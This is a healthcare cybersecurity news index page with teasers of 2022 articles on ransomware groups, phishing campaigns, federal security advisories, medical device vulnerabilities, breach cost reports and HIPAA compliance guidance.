Healthcare cybersecurity is a growing concern. The last few years have seen hacking and IT security incidents steadily rise and many healthcare organizations have struggled to defend their network perimeter and keep cybercriminals at bay.

2015 was a record year for healthcare industry data breaches. More patient and health plan member records were exposed or stolen in 2015 than in the previous 6 years combined, and by some distance. More than 113 million records were compromised in 2015 alone, 78.8 million of which were stolen in a single cyberattack. 2016 saw more healthcare data breaches reported than any other year, and 2017 looks set to be another record breaker.

Healthcare providers now have to secure more connected medical devices than ever before and there has been a proliferation of IoT devices in the healthcare industry. The attack surface is growing and cybercriminals are developing more sophisticated tools and techniques to attack healthcare organizations, gain access to data and hold data and networks to ransom.

The healthcare industry has been slow to respond and has lagged behind other industries when it comes to cybersecurity. However, cybersecurity budgets have increased, new technology has been purchased, and healthcare organizations are getting better at blocking attacks and keeping their networks secure.

The articles in this healthcare cybersecurity section are intended to help HIPAA covered entities decide on the best technologies to protect their networks from attack and develop effective policies, procedures and security awareness training programs to prevent costly data breaches.

Our healthcare cybersecurity section contains articles and new reports relating to:

New vulnerabilities that could be exploited to gain access to healthcare networks

Security warnings about new attack vectors currently being used by cybercriminals to gain access to healthcare networks and data

Details of new malware and ransomware that threaten the confidentiality, integrity, and availability of protected health information

Healthcare cybersecurity best practices

New guidelines for HIPAA covered entities on data and device security

Updates from the Healthcare Industry Cybersecurity Task Force

Details of cybersecurity frameworks that can be adopted by healthcare organizations to improve security posture

Advice related to the HIPAA Security Rule and the safeguards that must be applied to secure medical devices, networks and healthcare data

The latest healthcare cybersecurity surveys, reports and white papers

Ransomware Gangs Adopt Callback Phishing Techniques for Gaining Initial Network Access
Aug15

Ransomware Gangs Adopt Callback Phishing Techniques for Gaining Initial Network Access

Multiple ransomware groups have adopted the BazarCall callback phishing technique to gain initial access to victims’ networks, including threat actors that have targeted the healthcare sector. BazarCall is a type of callback phishing, where organizations are targeted and sent ‘phishing’ emails that request a call to a telephone number to resolve an important issue. As with standard phishing campaigns, there is urgency – If no action is taken, there will be bad consequences. The telephone number provided is manned by the threat actor, who is well versed in social engineering techniques and will attempt to trick the caller into taking actions that will give the threat actor access to the victims’ network. That action could be to visit a malicious website or download a malicious file. In the BazarCall campaign, the targeted individual is told in the email that a subscription or free trial is coming to an end and it will auto-renew at a cost. In order to cancel the subscription, the user must call the number provided. If the call is made, the threat actor will attempt to get the user...

Read More
Healthcare Providers Targeted in Evernote Phishing Campaign
Aug12

Healthcare Providers Targeted in Evernote Phishing Campaign

A malicious phishing campaign has been identified that is targeting healthcare providers. The emails have an Evernote-themed lure to trick recipients into downloading a Trojan file that generates a login prompt to steal credentials. The Health Information Cybersecurity Coordination Center (HC3) has recently issued an alert about the campaign which has targeted several healthcare providers in the United States.  Malicious emails are sent to targeted organizations that contain a malicious link to an Evernote-themed website. The emails are personalized and the lures used in the phishing emails may vary; however, the emails seen by HC3 have the subject line “[Organization Name] [Date] Business Review” and have a Secure Message theme. The link included in the email directs the user to the Evernote site, where they are prompted to download an HTML file – called message (3).html. The file includes JavaScript code that renders an Adobe or Microsoft-themed page that attempts to harvest Outlook, IONOS, AOL, or other credentials. The credentials obtained in phishing campaigns such as this can...

Read More
CISA Sounds Alarm About Zeppelin Ransomware Targeting Healthcare Organizations
Aug11

CISA Sounds Alarm About Zeppelin Ransomware Targeting Healthcare Organizations

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued a joint security alert about the Zeppelin ransomware-as-a-service (RaaS) operation, which has extensively targeted organizations in the healthcare and medical industries. Zeppelin ransomware, a variant of Vega malware, has been used in attacks on critical infrastructure organizations since 2019. The threat actors have been observed using a variety of vectors to gain initial access to victims’ networks, especially the exploitation of Remote Desktop Protocol (RDP), vulnerabilities in SonicWall appliances, vulnerabilities in Internet-facing applications, and phishing emails. The phishing-based attacks use a combination of malicious links and attachments containing malicious macros. The threat actors typically spend around 1-2 weeks inside victims’ networks before deploying the ransomware payload. During this time, they map or enumerate victims’ networks, identify data of interest, including backups and cloud storage services, and exfiltrate sensitive data. A...

Read More
1H 2022 Healthcare Data Breach Report
Aug11

1H 2022 Healthcare Data Breach Report

Ransomware attacks are rife, hacking incidents are being reported at high levels, and there have been several very large healthcare data breaches reported so far in 2022; however, our analysis of healthcare data breaches reported in 1H 2022, shows that while data breaches are certainly being reported in high numbers, there has been a fall in the number of reported breaches compared to 1H 2021. Between January 1, 2022, and June 30, 2022, 347 healthcare data breaches of 500 or more records were reported to the Department of Health and Human Services’ Office for Civil Rights (OCR) – the same number of data breaches reported in 2H, 2021. In 1H, 2021, 368 healthcare data breaches were reported to OCR, 21 fewer breaches than the corresponding period this year. That represents a 5.71% reduction in reported breaches. The number of healthcare records breached has continued to fall. In 1H, 2021, 27.6 million healthcare records were breached. In 2H, 2021, the number of breached records fell to 22.2 million, and the fall continued in 1H, 2022, when 20.2 million records were breached. That is a...

Read More
HC3 Warns About Risks of IoT in Healthcare
Aug09

HC3 Warns About Risks of IoT in Healthcare

The Health Sector Cybersecurity Coordination Center (HC3) has published a security advisory warning the healthcare and public health sector about the risks associated with Internet of Things (IoT) devices and has made recommendations for improving the security of IoT devices. The Internet of Things (IoT) refers to physical devices that have the capability to exchange data or connect to other devices over the Internet. Currently, there are around 7 billion devices that are connected through IoT, and IoT device use is expected to increase to 20 billion devices worldwide by 2025. These devices use sensors to collect data and communicate over the Internet and include a wide range of “smart” appliances such as TVs and washing machines, doorbell cameras, Amazon Echo devices, voice controllers, and wearable devices. IoT devices are used in industrial settings and many medical devices use IoT. While there have been major advances in IoT technology in recent years to make the technology cheaper and more accessible, the main architectural layers have largely remained unchanged and there is...

Read More
Most Common Malware Strains in 2021
Aug05

Most Common Malware Strains in 2021

The U.S. Cybersecurity and Infrastructure Security Agency has published a list of the top malware strains identified in 2021. Malware is used by threat actors to compromise devices, giving them a backdoor into devices and networks for performing a range of nefarious activities. Malware can also be destructive and be used to sabotage systems, such as wipers that delete all data in systems. The rise in the value of cryptocurrencies has seen an increase in the use of cryptocurrency miners, which hijack the resources of systems for mining cryptocurrencies. Malware such as worms are able to not just compromise one device, but also self-propagate and infect all other vulnerable devices on a network. In recent years there has been a major increase in the use of ransomware. Ransomware encrypts files on targeted systems to prevent data access, and a ransom demand is issued for the keys to unlock the encryption. Most ransomware variants also support data exfiltration, and files are stolen prior to encryption. The ransom must then be paid not just to decrypt files, but also to prevent the...

Read More
55% of Healthcare Organizations Suffered a Third-Party Data Breach in the Past Year
Aug03

55% of Healthcare Organizations Suffered a Third-Party Data Breach in the Past Year

Cyberattacks on businesses have been increasing year over year across all industry sectors, and there has been an increase in cyberattacks involving third parties. From the point of view of a cyber threat actor, it makes more sense to attack a vendor such as a managed service provider, as if the attack is successful, the threat actor will be able to gain access to the networks of the company’s clients. Already in 2022, there have been several major cyberattacks on vendors used by healthcare organizations, one of which impacted 650 of the company’s HIPAA-covered entity clients. SecureLink, a provider of access management solutions for businesses, has recently explored how businesses are managing the risk associated with providing vendors with privileged access to their systems and has identified areas where the risks are not being effectively managed, even though efforts are being made to improve cybersecurity. For SecureLink’s latest report, The State of Cybersecurity and Third-Party Remote Access Risk, the company surveyed 600 U.S. companies across a range of industry sectors,...

Read More
Ransom Payment Data Suggests More Victims are Choosing Not to Pay
Aug02

Ransom Payment Data Suggests More Victims are Choosing Not to Pay

The average payment to ransomware gangs increased in Q2, 2022; however, there was a fall in the median payment for the second successive quarter, indicating more victims of ransomware attacks are choosing not to pay up. The data comes from the latest quarterly report from the ransomware remediation firm, Coveware. The average ransom payment in Q2, 2022 was $228,125, which is an 8% increase from the previous quarter. The median ransom payment was $36,360, which is a 51% decrease from Q1, 2022. According to Coveware, the recent fall in payments indicates the changing profile of attacked companies, with ransomware gangs now tending to focus on attacking mid-market companies. Attacks on large enterprises are costly due to their large budgets for cybersecurity but the potential returns are greater. While ransomware attacks on mid-market firms mean the ransom demands must be smaller, the risks associated with attacks are also lower. Mid-market firms appear to be the sweet spot. The profits are sufficiently high to make the attacks worthwhile, and the ransomware gangs are less likely to...

Read More
Ransomware Attacks Drop by 23% Globally but Increase by 328% in Healthcare
Jul29

Ransomware Attacks Drop by 23% Globally but Increase by 328% in Healthcare

SonicWall has released a mid-year update to its 2022 Cyber Threat Report, which highlights the global cyberattack trends in H1 2022. The data for the report was collected from more than 1.1 million global sensors in 215 countries and shows a global fall in ransomware attacks, with notable increases in malware attacks for the first time in 3 years. Ransomware SonicWall reports a 23% fall in ransomware attacks globally in H1 2022, which fell to 236.1 million attempted attacks, continuing the downward trend that has been observed for the previous four quarters. June 2022 saw the lowest number of ransomware hits in the past 23 months. While ransomware attacks are down overall, that is not the case for the healthcare industry, which saw a 328% increase in attacks in H1 2022. While the reduction in attacks is certainly good news, it should be noted that the year-to-date figures for ransomware attacks are still higher than they were in all of 2017, 2018, and 2019. In the United States, SonicWall recorded an average of 707 ransomware attempts per customer in the first half of 2022....

Read More
IBM: Average Cost of a Healthcare Data Breach Reaches Record High of $10.1 Million
Jul28

IBM: Average Cost of a Healthcare Data Breach Reaches Record High of $10.1 Million

The average cost of a healthcare data breach has reached double digits for the first time ever, according to the 2022 Cost of a Data Breach Report from IBM. The average cost of a healthcare data breach jumped almost $1 million to a record high of $10.1 million, which is 9.4% more than in 2021 and 41.6% more than in 2020. Across all industry sectors, the average cost of a data breach was up 2.6% year over year at $4.35 million, which is the highest average cost in the 17 years that IBM has been producing its annual cost of a data breach reports and 12.7% higher than in 2020. The report is based on a study of 550 organizations in 17 countries and regions and 17 different industry sectors that suffered data breaches between March 2021 and March 2022. For the report, IBM Security conducted more than 3,600 interviews with individuals in those organizations. 83% of organizations represented in the report have experienced more than one data breach, and 60% of organizations said the data breach resulted in them having to increase the price of their products and services. Summary of 2022...

Read More
Cloud Security Alliance Releases Third Party Vendor Risk Management Guidance for Healthcare Organizations
Jul27

Cloud Security Alliance Releases Third Party Vendor Risk Management Guidance for Healthcare Organizations

Cyber actors are increasingly targeting business associates of HIPAA-covered entities as they provide an easy way to gain access to the networks of multiple healthcare organizations. To help healthcare delivery organizations (HDOs) deal with the threat, the Cloud Security Alliance (CSA) has published new guidance on third-party vendor risk management in healthcare. The guidance was drafted by the Health Information Management Working Group and includes examples and use cases and provides information on some of the risk management program tools that can be used by HDOs for risk management. Third-party vendors provide invaluable services to HDOs, including services that cannot be effectively managed in-house; however, the use of vendors introduces cybersecurity, reputational, compliance, privacy, operational, strategic, and financial risks that need to be managed and mitigated. The guidance is intended to help HDOs identify, assess, and mitigate the risks associated with the use of third-party vendors to prevent and limit the severity of security incidents and data breaches....

Read More
HC3 Warns of Risk of Web Application Attacks on Healthcare Organizations
Jul25

HC3 Warns of Risk of Web Application Attacks on Healthcare Organizations

The Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has issued guidance to help healthcare organizations protect against web application attacks. Web applications have grown in popularity in healthcare in recent years and are used for patient portals, electronic medical record systems, scheduling appointments, accessing test results, patient monitoring, online pharmacies, dental CAD systems, inventory management, and more. These applications are accessed through a standard web browser, however, in contrast to most websites, the user is required to authenticate to the application. Web application attacks are conducted by financially motivated cybercriminals and state-sponsored Advanced Persistent Threat (APT) actors for a range of different nefarious activities. Attacks exploiting vulnerabilities in web applications have been increasing and web application attacks are now the number one healthcare attack vector, according to the 2022 Verizon Data Breach Investigations Report. Web application attacks most commonly target internet-facing...

Read More
Department of Justice Announces Seizure of $500,000 in Ransom Payments Made by U.S. Healthcare Providers
Jul21

Department of Justice Announces Seizure of $500,000 in Ransom Payments Made by U.S. Healthcare Providers

The U.S Department of Justice has announced that around $500,000 in Bitcoin has been seized from North Korean threat actors who were using Maui ransomware to attack healthcare organizations in the United States. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) recently issued a security alert warning that North Korean hackers have been targeting the healthcare and public health sector in the United States using Maui ransomware since at least May 2021. The attacks have caused extensive disruption to IT systems and medical services and have put patient safety at risk. The new ransomware variant was discovered during an investigation of a ransomware attack on a hospital in Kansas in May 2021. The attack was traced to a North Korean hacking group that is suspected of receiving backing from the state. The Kansas hospital had its servers encrypted, preventing access to essential IT systems for more than a week. The hospital paid a ransom of $100,000 for the keys to decrypt files and regain access to its servers and promptly...

Read More
Study Confirms Security Awareness Training Significantly Reduces Susceptibility to Phishing Attacks
Jul19

Study Confirms Security Awareness Training Significantly Reduces Susceptibility to Phishing Attacks

A recent Phishing by Industry Benchmarking Report has confirmed that providing security awareness training to the workforce significantly reduces susceptibility to phishing attacks. The benchmarking study was conducted by KnowBe4 to determine how effective security awareness training is at reducing susceptibility to phishing attacks. For the report, KnowBe4 analyzed data from more than 9.5 million users across 19 industry sectors, over 30,000 organizations, and 23.4 million simulated phishing emails. The study was conducted on small 22,558 organizations with 1-249 employees, 5,876 mid-sized organizations with between 250 and 999 employees, and 1,709 large organizations with 1,000 or more employees. According to the 2022 Verizon Data Breach Investigations Report (DBIR), 82% of data breaches in 2021 involved a human element, confirming that people play a major role in security incidents and data breaches. Cybercriminals continue to target the human element as it provides an easy way of gaining access to business networks, and one of the main whys that employees are targeted is...

Read More
Cyber Safety Review Board Says Log4j Vulnerabilities Endemic and Will Persist for Years
Jul18

Cyber Safety Review Board Says Log4j Vulnerabilities Endemic and Will Persist for Years

The Cyber Safety Review Board (CSRB), established by President Biden in February 2022, has published a report on the Log4j vulnerability – CVE-2021-44228 – and associated vulnerabilities that were discovered in late 2021. The vulnerabilities affect the open source Java-based logging tool, Log4j, and, according to CSRB, they are endemic and are likely to be present in many systems for years to come. The Log4j vulnerability can be exploited remotely to achieve code execution on vulnerable systems and was assigned a maximum CVSS severity score of 10 out of 10. According to the report, the vulnerabilities are among the most serious to be discovered in recent years. The CSRB includes 15 cybersecurity leaders from the private sector and government and has been tasked with conducting reviews of major cybersecurity events and making recommendations for improving public and private sector cybersecurity. The Log4J vulnerability report is the first to be published by the CSRB since its formation. “At this critical juncture in our nation’s cybersecurity, when our ability to handle risk is not...

Read More
Oklahoma State University Settles HIPAA Case with OCR for $875,000
Jul15

Oklahoma State University Settles HIPAA Case with OCR for $875,000

The Department of Health and Human Services’ (HHS) Office for Civil Rights (OCR) has announced that Oklahoma State University – Center for Health Sciences (OSU-CHS) has agreed to settle a HIPAA investigation stemming from a web server hacking incident and has agreed to pay a financial penalty of $875,000 to resolve potential violations of the HIPAA Privacy, Security, and Breach Notification Rules. OSU-CHS is a public land-grant research university that provides preventive, rehabilitative, and diagnostic care in Oklahoma. OCR launched a HIPAA investigation after receiving a breach report on January 5, 2018, in response to the hacking of an OSU-CHS web server. OSU-CHS determined that malware had been installed on the server which allowed the hacker(s) to access the electronic protected health information of 279,865 individuals. The information exposed and potentially obtained by an unauthorized third party included names, Medicaid numbers, healthcare provider names, dates of service, dates of birth, addresses, and treatment information. OSU-CHS initially declared that the data breach...

Read More
Over 10,000 Organizations Targeted in Ongoing MFA-Bypassing Phishing and BEC Campaign
Jul13

Over 10,000 Organizations Targeted in Ongoing MFA-Bypassing Phishing and BEC Campaign

Microsoft has warned of a large-scale phishing campaign targeting Office 365 credentials that bypasses multi-factor authentication (MFA). The campaign is ongoing and more than 10,000 organizations have been targeted by scammers in the past 10 months. Microsoft reports that one of the phishing runs used emails with HTML file attachments, with the email telling the user about a Microsoft voicemail message that had been received. The HTML file had to be opened to download the message. The HTML file serves as a gatekeeper, ensuring the targeted user was arriving at the URL from a redirect from the original attachment. The user is redirected to a website that hosts a popular open source phishing kit, which is used to harvest credentials. The user is told that they need to sign in to their Microsoft account to receive the voicemail message and after sign in an email will be sent to the user’s mailbox within an hour with the MP3 voicemail message attached. The user’s email address is auto-filled into the login window and the user only needs to enter their password. This campaign is...

Read More
Feds Warn of Threat of Maui Ransomware Attacks By North Korean State-Sponsored Hackers
Jul07

Feds Warn of Threat of Maui Ransomware Attacks By North Korean State-Sponsored Hackers

A joint security alert has been issued to the healthcare and public health sector by the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury warning about the threat of Maui ransomware attacks. Since May 2021, North Korean state-sponsored cyber actors have been targeting organizations in the U.S. healthcare and public health sector and have been encrypting servers that support electronic medical record systems and diagnostic, imaging, and intranet services. These attacks have resulted in data encryption which has disrupted the services provided to patients and, in some cases, has resulted in disruption to services for long periods. According to the advisory, initial access is gained to healthcare networks and the ransomware is deployed manually. The threat actors use a command-line interface to control the ransomware payload and launch attacks. Healthcare organizations are an attractive target for ransomware threat actors as they are heavily reliant on data for providing their services. Attacks can cause...

Read More
FBI, CISA, & FinCEN Sound Alarm About MedusaLocker Ransomware
Jul06

FBI, CISA, & FinCEN Sound Alarm About MedusaLocker Ransomware

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of the Treasury, and the Financial Crimes Enforcement Network (FinCEN) have issued a joint cybersecurity advisory about MedusaLocker ransomware. The MedusaLocker threat group appears to operate as a ransomware-as-a-service operation, where affiliates are recruited to conduct the attacks for between 55 and 60% of any ransom payments they generate. MedusaLocker was first detected in September 2019 and has been used to attack a broad range of targets in the United States. Once access to victims’ networks has been gained, a batch file is used to execute a PowerShell script which propagates MedusaLocker throughout the network. This is achieved by editing the EnableLinkedConnections value within the infected machine’s registry, which then allows the infected machine to detect attached hosts and networks via Internet Control Message Protocol (ICMP) and detect shared storage via Server Message Block (SMB) Protocol. MedusaLocker will terminate security, accounting, and forensic...

Read More
Warning Issued About 3 High-Severity Vulnerabilities in OFFIS DICOM Software
Jun28

Warning Issued About 3 High-Severity Vulnerabilities in OFFIS DICOM Software

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a security advisory for the healthcare and public health sector warning about three high-severity vulnerabilities in OFFIS DCMTK software. The software is used for examining, constructing, and converting DICOM image files, handling offline media, and sending and receiving images over a network connection. The vulnerabilities affect all versions of DCMTK prior to version 3.6.7. If exploited, a remote attacker could trigger a denial-of-service condition, write malformed DICOM files into arbitrary directories, and gain remote code execution. Two path traversal vulnerabilities have been identified in the product which could be exploited to write malformed files into arbitrary directories under controlled names, allowing remote code execution. The product’s service class provider (SCP) is vulnerable to path traversal – CVE-2022-2119 – and the service class user (SCU) is vulnerable to relative path traversal – CVE-2022-2120. Both vulnerabilities have been assigned a CVSS v3 base score of 7.5 out of 10 (high...

Read More
Vulnerabilities Identified in Welch Allyn Resting Electrocardiograph Devices
Jun21

Vulnerabilities Identified in Welch Allyn Resting Electrocardiograph Devices

Hillrom Medical Device Management has announced that two vulnerabilities have been identified in certain Welch Allyn medical devices. If exploited the vulnerabilities could allow an unauthorized attacker to compromise software security by executing commands, gaining privileges, and reading sensitive information while evading detection. The vulnerabilities affect the following Hillrom products: Welch Allyn ELI 380 Resting Electrocardiograph (versions 2.6.0 and prior) Welch Allyn ELI 280/BUR280/MLBUR 280 Resting Electrocardiograph (versions 2.3.1 and prior) Welch Allyn ELI 250c/BUR 250c Resting Electrocardiograph (versions 2.1.2 and prior) Welch Allyn ELI 150c/BUR 150c/MLBUR 150c Resting Electrocardiograph (versions 2.2.0 and prior) The two vulnerabilities were discovered by an anonymous researcher who reported to Hillrom. The most serious vulnerability – tracked as CVE-2022-26389 – has a CVSS v3 severity score of 7.7 out of 10 (high severity), and is due to improper access controls for restricting attempts at accessing resources by unauthorized individuals. The second...

Read More
HHS Offers Advice to Help Healthcare Organizations Strengthen Their Cyber Posture
Jun20

HHS Offers Advice to Help Healthcare Organizations Strengthen Their Cyber Posture

The HHS’ Health Sector Cybersecurity Coordination Sector (HC3) has published guidance for healthcare organizations to help them improve their cyber posture. Cyber posture is the term given for the overall strength of an organization’s cybersecurity, protocols for predicting and preventing cyber threats, and the ability to continue to operate while responding to cyber threats. To comply with the HIPAA Security Rule, organizations are required to implement safeguards to ensure the confidentiality, integrity, and availability of electronic protected health information, and reduce risks to a low and acceptable level. Technical safeguards will help to keep ePHI private and confidential and will ensure ePHI can be recovered in the event of a destructive cyberattack. A robust cybersecurity program can help to limit the damage caused in the event of an attack, can prevent the theft of sensitive information such as ePHI and intellectual property, limit the potential for misuse of patient data, and will help to improve customer confidence. HC3 details several steps that can be taken to...

Read More
Webinar Today: July 20, 2022: Compliance vs. Security: Why you Need Both to be HIPAA Compliant
Jun20

Webinar Today: July 20, 2022: Compliance vs. Security: Why you Need Both to be HIPAA Compliant

Healthcare providers, health plans, healthcare clearinghouses, and business associates of those entities that come into contact with protected health information (PHI) are required to ensure policies, processes, and people are compliant with the Rules of the Health Insurance Portability and Accountability Act (HIPAA). Ensuring you have a good security posture is an important part of HIPAA compliance. The HIPAA Security Rule requires HIPAA-regulated entities to have appropriate safeguards in place to ensure the confidentiality, integrity, and availability of ePHI, and to manage risks to protected health information and reduce them to a low and acceptable level. Ensuring you have a good security posture has never been more important. Cyber threat actors have stepped up their attacks on the healthcare industry and data breaches are occurring at record levels. Further, following the ‘Safe Harbor’ update to the HITECH Act, if you are able to demonstrate you have implemented recognized security practices, you will be protected against fines, sanctions, and extensive audits and...

Read More
Bipartisan Legislation Introduced to Strengthen Cybersecurity for Medical Devices
Jun17

Bipartisan Legislation Introduced to Strengthen Cybersecurity for Medical Devices

A bipartisan bill – The Strengthening Cybersecurity for Medical Devices Act – has been introduced which calls for the U.S. Food and Drug Administration (FDA) to review and update its guidelines on medical device cybersecurity more frequently to ensure devices are protected from potential hacking and cyberattacks. The bill, introduced by Sen. Jacky Rosen (D-NV) and co-sponsored by Sen Todd Young (R-IN), calls for the Secretary of the Department of Health and Human Services (HHS), in consultation with the Director of the Cybersecurity and Infrastructure Security Agency (CISA), to provide updated guidance on medical device cybersecurity to FDA every year, and for the FDA to issue updated guidelines and suggestions on medical device cybersecurity at least every two years. The frequency of updates needs to be improved to ensure the guidelines remain current, especially considering the fast-evolving threat landscape and the extent to which the healthcare industry is being targeted by cyber threat actors. “Medical devices are increasingly connected to the Internet or other...

Read More
The HIPAA Password Requirements and the Best Way to Comply With Them
Jun09

The HIPAA Password Requirements and the Best Way to Comply With Them

It is important that Covered Entities and Business Associates understand the HIPAA password requirements and the best way to comply with them because if a data breach is found to be attributable to a lack of compliance, the penalties could be significant. However, understanding the HIPAA password requirements is not straightforward. HIPAA is intentionally technology-neutral; so whereas Security Standard §164.312(d) stipulates Covered Entities must “implement procedures to verify that a person or entity seeking access to electronic protected health information is the one claimed”, there is no indication what procedures should be implemented or even that user verification should be password-based. Guidance published by the Department of Health and Human Services suggests there are three ways in which users can verify their identity: With something only known to the user, such as a password or PIN, With something the user possesses, such as a smart card or key, or With something unique to the user, such as a fingerprint or facial image. In addition to the above, a required...

Read More
DogWalk Zero-day Windows MSDT Vulnerability Gets Unofficial Patch
Jun08

DogWalk Zero-day Windows MSDT Vulnerability Gets Unofficial Patch

Another zero-day vulnerability has been identified that affects the same Windows tool as Follina. While the vulnerability is not known to have been exploited in the wild, the bug is exploitable and the recent interest and widespread exploitation of the Follina vulnerability make exploitation of this flaw more likely. The vulnerability affects the Microsoft Diagnostic Tool (MSDT) and is a path traversal flaw that can be exploited to copy an executable file to the Windows Startup folder. The vulnerability can be exploited by sending a specially crafted .diagcab file via email or convincing a user to download the file from the Internet. .diagcab files are Cabinet files that include a diagnostic configuration file. In this attack, once the startup entry is implanted, the executable file will be run the next time Windows is restarted. The vulnerability was identified and publicly disclosed by security researcher Imre Red in January 2020. Microsoft decided not to issue a fix as this was technically not a security issue, and since .diagcab files are considered unsafe they are...

Read More
HC3 Warns Healthcare Sector About Growing Threat from Emotet Malware
Jun08

HC3 Warns Healthcare Sector About Growing Threat from Emotet Malware

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has issued a warning to the healthcare sector about the threat from Emotet malware. Emotet was first detected in 2014 and was initially a banking Trojan; however, the malware has been updated over the years and has had new features added. In addition to serving as a banking Trojan, the malware includes a dropper for delivering other malware variants and is offered to other cybercriminal groups under the infrastructure-as-a-service (IaaS) model. Emotet has been used to deliver a range of malware variants including IcedID, Trickbot, Qbot, Azorult, and ransomware payloads such as Ryuk and BitPaymer. According to Europol, Emotet is the most dangerous malware variant and has infected one in five organizations worldwide. Data from Malwarebytes indicates 80% of malware infections at healthcare organizations involved Trojans, and Emotet was the most common Trojan deployed in attacks on the healthcare sector. Europol considers Emotet to be the most dangerous malware currently in use. Emotet is operated by the MUMMY SPIDER threat...

Read More
Healthcare Ransomware Attacks Increased by 94% in 2021
Jun06

Healthcare Ransomware Attacks Increased by 94% in 2021

Ransomware attacks on healthcare organizations increased by 94% year over year, according to the 2022 State of Ransomware Report from cybersecurity firm Sophos. The report is based on a global survey of 5,600 IT professionals and included interviews with 381 healthcare IT professionals from 31 countries.  This year’s report focused on the rapidly evolving relationship between ransomware and cyber insurance in healthcare. 66% of surveyed healthcare organizations said they had experienced a ransomware attack in 2021, up from 34% in 2020 and the volume of attacks increased by 69%, which was the highest of all industry sectors. Healthcare had the second-highest increase (59%) in the impact of ransomware attacks. According to the report, the number of healthcare organizations that paid the ransom has doubled year over year. In 2021, 61% of healthcare organizations that suffered a ransomware attack paid the ransom – The highest percentage of any industry sector. The global average was 46%, which is almost twice the percentage of the previous year. Paying the ransom may help healthcare...

Read More
Atlassian Releases Patch for Maximum Severity Widely Exploited Vulnerability in Confluence Server and Data Center
Jun05

Atlassian Releases Patch for Maximum Severity Widely Exploited Vulnerability in Confluence Server and Data Center

Atlassian has released a patch to fix a critical zero-day vulnerability that affects all supported versions of Confluence Server and Data Center. The vulnerability – tracked as CVE-2022-26134 – has a maximum CVSS severity score of 10 out of 10 and can be exploited remotely by unauthenticated attackers to achieve code execution. According to security researchers, exploiting the flaw is trivial, with no user interaction or privileges required. Last week, cybersecurity firm Volexity detected exploitation of the vulnerability while responding to a security breach. The researchers were able to reproduce the exploit for the flaw and shared details of the vulnerability with Atlassian last week. Volexity reports that in the incident its researchers investigated, the attackers were most likely based in China and exploited the vulnerability to run malicious code and installed webshells such as BEHINDER and China Chopper. The attackers conducted reconnaissance, checked local confluence databases and dumped user tables, altered web access logs to remove traces of exploitation, and wrote...

Read More
Healthcare Organizations Warned About Maximum Severity Vulnerabilities in Illumina Devices
Jun03

Healthcare Organizations Warned About Maximum Severity Vulnerabilities in Illumina Devices

Five vulnerabilities have been identified in the Illumina Local Run Manager (LRM), which is used by Illumina In Vitro Diagnostic (IVD) devices and Illumina Researcher Use Only (ROU) instruments. The affected devices are used for clinical diagnostic DNA sequencing and testing for various genetic conditions, and for research use. Four of the vulnerabilities are critical, with three having a maximum CVSS severity score of 10 out of 10. The vulnerabilities affect the following devices and instruments: Illumina IVD Devices NextSeq 550Dx: LRM Versions 1.3 to 3.1 MiSeq Dx: LRM Versions 1.3 to 3.1 Illumina ROU Devices NextSeq 500 Instrument: LRM Versions 1.3 to 3.1 NextSeq 550 Instrument: LRM Versions 1.3 to 3.1 MiSeq Instrument: LRM Versions 1.3 to 3.1 iSeq 100 Instrument: LRM Versions 1.3 to 3.1 MiniSeq Instrument: LRM Versions 1.3 to 3.1 A threat actor could exploit the vulnerabilities remotely, take control of the instruments, and perform any action at the operating system level such as modifying the settings, configurations, software, or data on the instrument. It would also be...

Read More
FBI Thwarted ‘Despicable’ Cyberattack on Boston Children’s Hospital
Jun03

FBI Thwarted ‘Despicable’ Cyberattack on Boston Children’s Hospital

In 2021, the Federal Bureau of Investigation (FBI) helped Boston Children’s Hospital mitigate a cyberattack by Iranian state-sponsored hackers before any damage could be caused. FBI Director, Christopher Wray, said the attempted cyberattack was “one of the most despicable cyberattacks I have ever seen.” Speaking at Boston College for the Boston Conference on Cyber Security, Wray said Iranian state-sponsored hackers exploited a vulnerability in a popular software solution made by the Californian cybersecurity vendor Fortinet. The FBI was alerted to the breach and the pending attack by another intelligence agency and notified the hospital on August 3, 2021. Wray said the FBI met with representatives of the hospital and provided information that helped the hospital identify and mitigate the threat. Wray said this was “a great example of why we deploy in the field the way we do, enabling that kind of immediate, before-catastrophe-strikes response,” and explained that the incident should serve as a reminder to all healthcare organizations to ensure they have an incident...

Read More
BD Issues Security Advisories About Pyxis and Synapsys Vulnerabilities
Jun01

BD Issues Security Advisories About Pyxis and Synapsys Vulnerabilities

BD has issued security advisories about two vulnerabilities that affect certain BD Pyxis automated medication dispensing system products and the BD Synapsys microbiology informatics software platform. BD Pyxis – CVE-2022-22767 According to BD, certain BD Pyxis products have been installed with default credentials and may still operate with those credentials. In some scenarios, the affected products may have been installed with the same default local operating system credentials or domain-joined server(s) credentials that may be shared across product types. If a threat actor were to exploit the vulnerability, it would be possible to gain privileged access to the underlying file system, which would allow access to ePHI or other sensitive information. The vulnerability is tracked as CVE-2022-22767 and has a CVSS v3 base score of 8.8 out of 10 (high severity). The following products are affected by the vulnerability BD Pyxis ES Anesthesia Station BD Pyxis CIISafe BD Pyxis Logistics BD Pyxis MedBank BD Pyxis MedStation 4000 BD Pyxis MedStation ES BD Pyxis MedStation ES Server BD...

Read More
Zero Day Microsoft Office Vulnerability can be Exploited with Macros Disabled
Jun01

Zero Day Microsoft Office Vulnerability can be Exploited with Macros Disabled

Microsoft has issued a security advisory and has provided workaround to prevent a zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) from being exploited. The vulnerability is tracked as CVE-2022-30190 and has been dubbed Follina by security researchers. According to Microsoft, “a remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word.” Over the weekend, security researcher nao_sec found a Word document that was leveraging remote templates to execute PowerShell commands on targeted systems via the MS-MSDT URL protocol scheme. In a recent blog post, security researcher Kevin Beaumont said the documents are not being detected as malicious by Microsoft Defender and detection by antivirus solutions is poor as the documents used to exploit the vulnerability do not contain any malicious code. Instead, they leverage remote templates to download an HTML file from a remote server, which allows an attacker to run malicious PowerShell commands. Most email attacks that use attachments for...

Read More
